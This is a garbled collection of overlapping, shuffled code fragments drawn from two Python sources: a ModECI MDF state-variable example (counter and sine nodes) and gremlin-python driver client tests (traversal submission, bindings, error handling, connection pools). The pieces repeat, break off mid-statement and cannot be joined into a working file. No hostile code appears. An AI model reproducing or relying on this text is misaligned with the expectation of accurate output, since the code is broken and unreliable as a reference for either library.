Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\",", "filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of this doesn't fail", "as plt plt.plot(times, s) plt.show() if \"-graph\" in sys.argv: mod.to_graph_image(", "# replace with initialize? 
else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt", "= Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\" )", "on Windows on GitHub Actions ) return mod_graph if __name__", "ModECI MDF - Testing state variables \"\"\" from modeci_mdf.mdf import", "load_mdf, print_summary from modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose)", "\"\"\" from modeci_mdf.mdf import * import sys def main(): mod", "======\" % (t)) if t == 0: eg.evaluate() # replace", "counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 =", "id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1) s2", "time_derivative=\"6.283185 * rate / period\" ) sine_node.parameters.append(s1) s2 = Parameter(", "<= duration: times.append(t) print(\"====== Evaluating at t = %s ======\"", "Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0,", "times.append(t) print(\"====== Evaluating at t = %s ======\" % (t))", "engine=\"dot\", output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test", "s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level", "Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count", "value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate /", "t = %s ======\" % (t)) if t == 0:", "rate / period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1,", "eg = EvaluableGraph(mod_graph, verbose) dt = 0.01 duration = 2", "= 0 recorded = {} times = [] s =", "fail on Windows on GitHub Actions ) return mod_graph if", "initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not", "Sine node... 
sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1", "value=\"count + increment\") counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node)", "= Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\",", "+= dt if \"-nogui\" not in sys.argv: import matplotlib.pyplot as", "/ period\" ) sine_node.parameters.append(s1) s2 = Parameter( id=\"rate\", default_initial_value=1, time_derivative=\"-1", "verbose = True # verbose = False from modeci_mdf.utils import", "output_format=\"png\", view_on_render=False, level=3, filename_root=\"states\", only_warn_on_fail=True, # Makes sure test of", "sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185 * rate", "time_derivative=\"-1 * 6.283185 * level / period\", ) sine_node.parameters.append(s2) op1", "node counter_node = Node(id=\"counter_node\") p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2", "sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node) new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\"", "test of this doesn't fail on Windows on GitHub Actions", "== 0: eg.evaluate() # replace with initialize? else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value)", "of ModECI MDF - Testing state variables \"\"\" from modeci_mdf.mdf", "p1 = Parameter(id=\"increment\", value=1) counter_node.parameters.append(p1) p2 = Parameter(id=\"count\", value=\"count +", "new_file = mod.to_json_file(\"%s.json\" % mod.id) new_file = mod.to_yaml_file(\"%s.yaml\" % mod.id)", "op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node", "OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... 
sine_node = Node(id=\"sine_node\")", "# verbose = False from modeci_mdf.utils import load_mdf, print_summary from", "modeci_mdf.execution_engine import EvaluableGraph eg = EvaluableGraph(mod_graph, verbose) dt = 0.01", "recorded = {} times = [] s = [] while", ") sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\", value=\"amp * level\") sine_node.output_ports.append(op1) mod_graph.nodes.append(sine_node)", "id=\"rate\", default_initial_value=1, time_derivative=\"-1 * 6.283185 * level / period\", )", "sys.argv: import matplotlib.pyplot as plt plt.plot(times, s) plt.show() if \"-graph\"", "EvaluableGraph(mod_graph, verbose) dt = 0.01 duration = 2 t =", "default_initial_value=1, time_derivative=\"-1 * 6.283185 * level / period\", ) sine_node.parameters.append(s2)", "if \"-run\" in sys.argv: verbose = True # verbose =", "= Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node counter_node = Node(id=\"counter_node\") p1", "import matplotlib.pyplot as plt plt.plot(times, s) plt.show() if \"-graph\" in", "6.283185 * level / period\", ) sine_node.parameters.append(s2) op1 = OutputPort(id=\"out_port\",", "Example of ModECI MDF - Testing state variables \"\"\" from", "else: eg.evaluate(time_increment=dt) s.append(eg.enodes[\"sine_node\"].evaluable_outputs[\"out_port\"].curr_value) t += dt if \"-nogui\" not in", "if \"-nogui\" not in sys.argv: import matplotlib.pyplot as plt plt.plot(times,", "mod = Model(id=\"States\") mod_graph = Graph(id=\"state_example\") mod.graphs.append(mod_graph) ## Counter node", "sure test of this doesn't fail on Windows on GitHub", "node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 =", "counter_node.parameters.append(p2) op1 = OutputPort(id=\"out_port\", value=p2.id) counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node...", "duration = 2 t = 0 recorded = {} times", "%s ======\" % (t)) if t == 0: eg.evaluate() #", "GitHub Actions ) return mod_graph if __name__ == \"__main__\": main()", "print(\"====== Evaluating at t = %s ======\" % (t)) if", "counter_node.output_ports.append(op1) mod_graph.nodes.append(counter_node) ## Sine node... sine_node = Node(id=\"sine_node\") sine_node.parameters.append(Parameter(id=\"amp\", value=3))", "= 0.01 duration = 2 t = 0 recorded =", "{} times = [] s = [] while t <=", "sine_node.parameters.append(Parameter(id=\"amp\", value=3)) sine_node.parameters.append(Parameter(id=\"period\", value=0.4)) s1 = Parameter( id=\"level\", default_initial_value=0, time_derivative=\"6.283185" ]
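The two time_derivative parameters above encode a coupled oscillator: level' = 2*pi*rate/period and rate' = -2*pi*level/period, so with level(0)=0 and rate(0)=1 the output "amp * level" traces 3*sin(2*pi*t/0.4). A hand-rolled sketch of that arithmetic, assuming simple fixed-step (Euler-style) integration, which is what a constant time_increment suggests; the actual stepping is performed by EvaluableGraph and may differ:

# Illustrative fixed-step integration of sine_node's two stateful parameters;
# not the MDF engine itself.
amp, period = 3, 0.4
level, rate = 0.0, 1.0   # default_initial_value of s1 and s2
dt, t, out = 0.01, 0.0, []
while t <= 2:            # duration = 2, as in the -run branch
    out.append(amp * level)                   # out_port: "amp * level"
    d_level = 6.283185 * rate / period        # level' from old rate
    d_rate = -1 * 6.283185 * level / period   # rate' from old level
    level += dt * d_level
    rate += dt * d_rate
    t += dt
# out approximates 3 * sin(2*pi*t / 0.4), the curve the -run branch plots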
[ "test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0] == 4 def", "in ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite", "gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph __author__ = '<NAME>", "# test perspective because there's no way to access the", "def test_iterate_result_set(client): g = Graph().traversal() t = g.V() message =", "really validate this from an integration # test perspective because", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message)", "t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message) results = []", "pool `future` may or may not be done here result_set", "pool size to be 1 again after query returned assert", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin':", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert", "client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) ==", "client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # with", "client.submit(message) assert len(result_set.all().result()) == 6 ## t = g.with_(\"x\", \"test\").with_(\"y\",", "limitations under the License. ''' import pytest from gremlin_python.driver.protocol import", "connection pool `future` may or may not be done here", "Foundation (ASF) under one or more contributor license agreements. See", "2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6 def", "fire an exception client.submit('1/0').all().result() assert False except GremlinServerError as ex:", "True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "assert False except GremlinServerError as ex: assert 'exceptions' in ex.status_attributes", "more contributor license agreements. See the NOTICE file distributed with", "== 6 # This future has to finish for the", "'aliases': {'g': 'g'}}) result_set = client.submit(message) results = [] for", "exception client.submit('1/0').all().result() assert False except GremlinServerError as ex: assert 'exceptions'", "t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "assert len(results) == 1 t = g.V().limit(10) message = RequestMessage('traversal',", "Apache License, Version 2.0 (the \"License\"); you may not use", "IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "to you under the Apache License, Version 2.0 (the \"License\");", "result in result_set: results += result assert len(results) == 10000", "serialization of OptionsStrategy. 
no way to really validate this from", "of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law", "1 again after query returned assert gse.status_code == 597 assert", "== 100 t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin':", "test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client client = Client('ws://localhost:45940/gremlin',", "def test_client_async(client): g = Graph().traversal() t = g.V() message =", "= g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "again after query returned assert gse.status_code == 597 assert client.available_pool_size", "results += result assert len(results) == 10 t = g.V().limit(100)", "test_client_bytecode_options(client): # smoke test to validate serialization of OptionsStrategy. no", "= g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS", "integration # test perspective because there's no way to access", "Graph().traversal() t = g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "pool_size=1) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result()", "result_set: results += result assert len(results) == 1000 t =", "the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or", "from gremlin_python.structure.graph import Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection):", "ANY KIND, either express or implied. See the License for", "Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage from", "assert len(result_set.all().result()) == 6 def test_client_bytecode_options(client): # smoke test to", "http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in", "in result_set: results += result assert len(results) == 1000 t", "may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless", "# should fire an exception client.submit('1/0').all().result() assert False except GremlinServerError", "result_set = client.submit(message) assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g", "one or more contributor license agreements. 
See the NOTICE file", "test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message =", "g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "assert client.submit('x + x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client):", "results = future.result() assert len(results) == 6 assert isinstance(results, list)", "future.result() assert len(results) == 6 assert isinstance(results, list) assert results_set.done.done()", "gse: # expecting the pool size to be 1 again", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) results =", "g.V().limit(10000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "ASF licenses this file to you under the Apache License,", "exception client.submit('1/0').all().result() assert False except GremlinServerError as gse: # expecting", "g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message", "under the License is distributed on an \"AS IS\" BASIS,", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result())", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client =", "len(results) == 1000 t = g.V().limit(10000) message = RequestMessage('traversal', 'bytecode',", "results_set.done.done() assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 +", "RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __ from", "The ASF licenses this file to you under the Apache", "way to access the internals of the strategy via bytecode", "= g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "file distributed with this work for additional information regarding copyright", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set =", "1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x':", "'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6 ## t", "should fire an exception client.submit('1/0').all().result() assert False except GremlinServerError as", "because there's no way to access the internals of the", "len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite fixture with pool_size=1", "assert len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: # should fire", "this file except in compliance with the License. 
You may", "client.submit('x + x', {'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert", "'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2", "len(results) == 1 t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode',", "result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # This future", "= future.result() assert len(result_set.all().result()) == 6 def test_connection_share(client): # Overwrite", "assert len(results) == 1000 t = g.V().limit(10000) message = RequestMessage('traversal',", "= secure_client.submit(message) results = [] for result in result_set: results", "'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result()", "t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future = results_set.all()", "def test_big_result_set(client): g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message", "len(results) == 100 t = g.V().limit(1000) message = RequestMessage('traversal', 'bytecode',", "to finish for the second to yield result - pool_size=1", "result in result_set: results += result assert len(results) == 100", "'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) == 6", "perspective because there's no way to access the internals of", "\"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "file except in compliance with the License. You may obtain", "== 6 def test_client_error(client): try: # should fire an exception", "for the second to yield result - pool_size=1 assert future.done()", "result in result_set: results += result assert len(results) == 6", "pool_size=1) g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message)", "assert isinstance(results, list) assert results_set.done.done() assert 'host' in results_set.status_attributes def", "{'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = client.submit(message) results =", "{'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results =", "def test_multi_conn_pool(client): g = Graph().traversal() t = g.V() message =", "OR CONDITIONS OF ANY KIND, either express or implied. 
See", "ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes def", "def test_connection(connection): g = Graph().traversal() t = g.V() message =", "== 2 def test_client_simple_eval_bindings(client): assert client.submit('x + x', {'x': 2}).all().result()[0]", "assert 'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client):", "assert gse.status_code == 597 assert client.available_pool_size == 1 def test_client_bytecode(client):", "the internals of the strategy via bytecode g = Graph().traversal()", "under the Apache License, Version 2.0 (the \"License\"); you may", "assert len(result_set.all().result()) == 6 def test_iterate_result_set(client): g = Graph().traversal() t", "== 597 assert client.available_pool_size == 1 def test_client_bytecode(client): g =", "in result_set: results += result assert len(results) == 10 t", "client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future = client.submitAsync(message) future2 =", "way to really validate this from an integration # test", "6 def test_client_bytecode_options(client): # smoke test to validate serialization of", "gse.status_code == 597 assert client.available_pool_size == 1 def test_client_bytecode(client): g", "t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2 = client.submitAsync(message2)", "== 6 def test_client_async(client): g = Graph().traversal() t = g.V()", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set", "{'g': 'g'}}) result_set = secure_client.submit(message) results = [] for result", "Graph __author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal()", "strategy via bytecode g = Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\",", "= client.submitAsync(message) future2 = client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result())", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "See the License for the specific language governing permissions and", "+= result assert len(results) == 1000 t = g.V().limit(10000) message", "of OptionsStrategy. no way to really validate this from an", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) future2 =", "import GremlinServerError from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError", "t.bytecode, 'aliases': {'g': 'gmodern'}}) result_set = client.submit(message) assert len(result_set.all().result()) ==", "regarding copyright ownership. 
The ASF licenses this file to you", "file to you under the Apache License, Version 2.0 (the", "after query returned assert gse.status_code == 597 assert client.available_pool_size ==", "1 t = g.V().limit(10) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "results += result assert len(results) == 10000 def test_big_result_set_secure(secure_client): g", "test_client_bytecode(client): g = Graph().traversal() t = g.V() message = RequestMessage('traversal',", "= client.submit(message) results = [] for result in result_set: results", "client.submit('1 + 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x +", "in writing, software distributed under the License is distributed on", "required by applicable law or agreed to in writing, software", "{'g': 'g'}}) result_set = client.submit(message) results = [] for result", "g = Graph().traversal() t = g.V() message = RequestMessage('traversal', 'bytecode',", "g = Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal',", "== 10 t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin':", "language governing permissions and limitations under the License. ''' import", "def test_connection_share(client): # Overwrite fixture with pool_size=1 client client =", "the NOTICE file distributed with this work for additional information", "'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1) future =", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin',", "= [] for result in result_set: results += result assert", "future2 = client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6", "agreements. See the NOTICE file distributed with this work for", "test_client_error(client): try: # should fire an exception client.submit('1/0').all().result() assert False", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set", "to the Apache Software Foundation (ASF) under one or more", "from gremlin_python.driver.client import Client from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request", "\"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "software distributed under the License is distributed on an \"AS", "distributed under the License is distributed on an \"AS IS\"", "= future2.result() assert len(result_set2.all().result()) == 6 # This future has", "6 assert isinstance(results, list) assert results_set.done.done() assert 'host' in results_set.status_attributes", "== 6 assert isinstance(results, list) assert results_set.done.done() assert 'host' in", "future = results_set.all() results = future.result() assert len(results) == 6", "CONDITIONS OF ANY KIND, either express or implied. 
See the", "= Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode',", "Version 2.0 (the \"License\"); you may not use this file", "<filename>gremlin-python/src/main/jython/tests/driver/test_client.py ''' Licensed to the Apache Software Foundation (ASF) under", "== 1 def test_client_bytecode(client): g = Graph().traversal() t = g.V()", "Licensed to the Apache Software Foundation (ASF) under one or", "results += result assert len(results) == 6 def test_client_async(client): g", "assert len(results) == 6 def test_client_async(client): g = Graph().traversal() t", "'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}})", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future =", "not use this file except in compliance with the License.", "2.0 (the \"License\"); you may not use this file except", "copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable", "= Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire an exception", "or may not be done here result_set = future.result() assert", "you may not use this file except in compliance with", "with pool_size=1 client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: #", "= results_set.all() results = future.result() assert len(results) == 6 assert", "pool_size=1 assert future.done() result_set = future.result() assert len(result_set.all().result()) == 6", "is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR", "the License. You may obtain a copy of the License", "'gmodern'}}) results_set = connection.write(message).result() future = results_set.all() results = future.result()", "Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire an exception client.submit('1/0').all().result()", "{'g': 'gmodern'}}) result_set = client.submit(message) results = [] for result", "(<EMAIL>)' def test_connection(connection): g = Graph().traversal() t = g.V() message", "use this file except in compliance with the License. 
You", "gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import", "Apache Software Foundation (ASF) under one or more contributor license", "message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set", "+ 1').all().result()[0] == 2 def test_client_simple_eval_bindings(client): assert client.submit('x + x',", "g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "be done here result_set = future.result() assert len(result_set.all().result()) == 6", "gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies import OptionsStrategy from gremlin_python.process.graph_traversal import", "assert len(results) == 10000 def test_big_result_set_secure(secure_client): g = Graph().traversal() t", "RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result()", "{'x': 2}).all().result()[0] == 4 def test_client_eval_traversal(client): assert len(client.submit('g.V()').all().result()) == 6", "= g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "Graph().traversal() t = g.withStrategies(OptionsStrategy(options={\"x\": \"test\", \"y\": True})).V() message = RequestMessage('traversal',", "= RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set =", "__.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "assert 'host' in results_set.status_attributes def test_client_simple_eval(client): assert client.submit('1 + 1').all().result()[0]", "may or may not be done here result_set = future.result()", "= '<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal() t =", "to be 1 again after query returned assert gse.status_code ==", "def test_client_bytecode_options(client): # smoke test to validate serialization of OptionsStrategy.", "governing permissions and limitations under the License. ''' import pytest", "6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal',", "to validate serialization of OptionsStrategy. no way to really validate", "g.V().limit(1000) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}})", "10 t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "result in result_set: results += result assert len(results) == 10", "in ex.status_attributes def test_client_connection_pool_after_error(client): # Overwrite fixture with pool_size=1 client", "= g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "len(client.submit('g.V()').all().result()) == 6 def test_client_error(client): try: # should fire an", "6 def test_client_error(client): try: # should fire an exception client.submit('1/0').all().result()", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) future = client.submitAsync(message) result_set =", "result_set: results += result assert len(results) == 10 t =", "additional information regarding copyright ownership. 
The ASF licenses this file", "has to finish for the second to yield result -", "(the \"License\"); you may not use this file except in", "except GremlinServerError as ex: assert 'exceptions' in ex.status_attributes assert 'stackTrace'", "be 1 again after query returned assert gse.status_code == 597", "specific language governing permissions and limitations under the License. '''", "You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0", "from gremlin_python.process.graph_traversal import __ from gremlin_python.structure.graph import Graph __author__ =", "client client = Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) try: # should fire", "= Graph().traversal() t = g.V() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "+= result assert len(results) == 6 def test_client_async(client): g =", "g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "6 def test_iterate_result_set(client): g = Graph().traversal() t = g.V() message", "from an integration # test perspective because there's no way", "the Apache License, Version 2.0 (the \"License\"); you may not", "or implied. See the License for the specific language governing", "Graph().traversal() t = g.inject(1).repeat(__.addV('person').property('name', __.loops())).times(20000).count() message = RequestMessage('traversal', 'bytecode', {'gremlin':", "KIND, either express or implied. See the License for the", "in result_set: results += result assert len(results) == 10000 def", "to in writing, software distributed under the License is distributed", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) client = Client('ws://localhost:45940/gremlin', 'g', pool_size=1)", "'gmodern', pool_size=1) try: # should fire an exception client.submit('1/0').all().result() assert", "# smoke test to validate serialization of OptionsStrategy. no way", "'exceptions' in ex.status_attributes assert 'stackTrace' in ex.status_attributes def test_client_connection_pool_after_error(client): #", "'aliases': {'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "law or agreed to in writing, software distributed under the", "from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.request import RequestMessage from gremlin_python.process.strategies", "assert len(result_set.all().result()) == 6 ## t = g.with_(\"x\", \"test\").with_(\"y\", True).V()", "{'g': 'gmodern'}}) message2 = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases': {'g':", "License. 
''' import pytest from gremlin_python.driver.protocol import GremlinServerError from gremlin_python.driver.client", "on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF", "= Client('ws://localhost:45940/gremlin', 'gmodern', pool_size=1) g = Graph().traversal() t = g.V()", "+= result assert len(results) == 100 t = g.V().limit(1000) message", "'bytecode', {'gremlin': t.bytecode, 'aliases': {'g': 'g'}}) result_set = secure_client.submit(message) results", "__author__ = '<NAME> (<EMAIL>)' def test_connection(connection): g = Graph().traversal() t", "client.submitAsync(message2) result_set2 = future2.result() assert len(result_set2.all().result()) == 6 # This", "[] for result in result_set: results += result assert len(results)", "len(results) == 6 assert isinstance(results, list) assert results_set.done.done() assert 'host'", "with this work for additional information regarding copyright ownership. The", "assert False except GremlinServerError as gse: # expecting the pool", "fire an exception client.submit('1/0').all().result() assert False except GremlinServerError as gse:", "results = [] for result in result_set: results += result", "you under the Apache License, Version 2.0 (the \"License\"); you", "second to yield result - pool_size=1 assert future.done() result_set =", "len(result_set.all().result()) == 6 def test_big_result_set(client): g = Graph().traversal() t =", "t = g.V().limit(100) message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode, 'aliases':", "smoke test to validate serialization of OptionsStrategy. no way to", "== 6 # with connection pool `future` may or may", "for the specific language governing permissions and limitations under the", "= g.with_(\"x\", \"test\").with_(\"y\", True).V() message = RequestMessage('traversal', 'bytecode', {'gremlin': t.bytecode,", "licenses this file to you under the Apache License, Version", "ownership. The ASF licenses this file to you under the", "{'gremlin': t.bytecode, 'aliases': {'g': 'gmodern'}}) results_set = connection.write(message).result() future =", "= 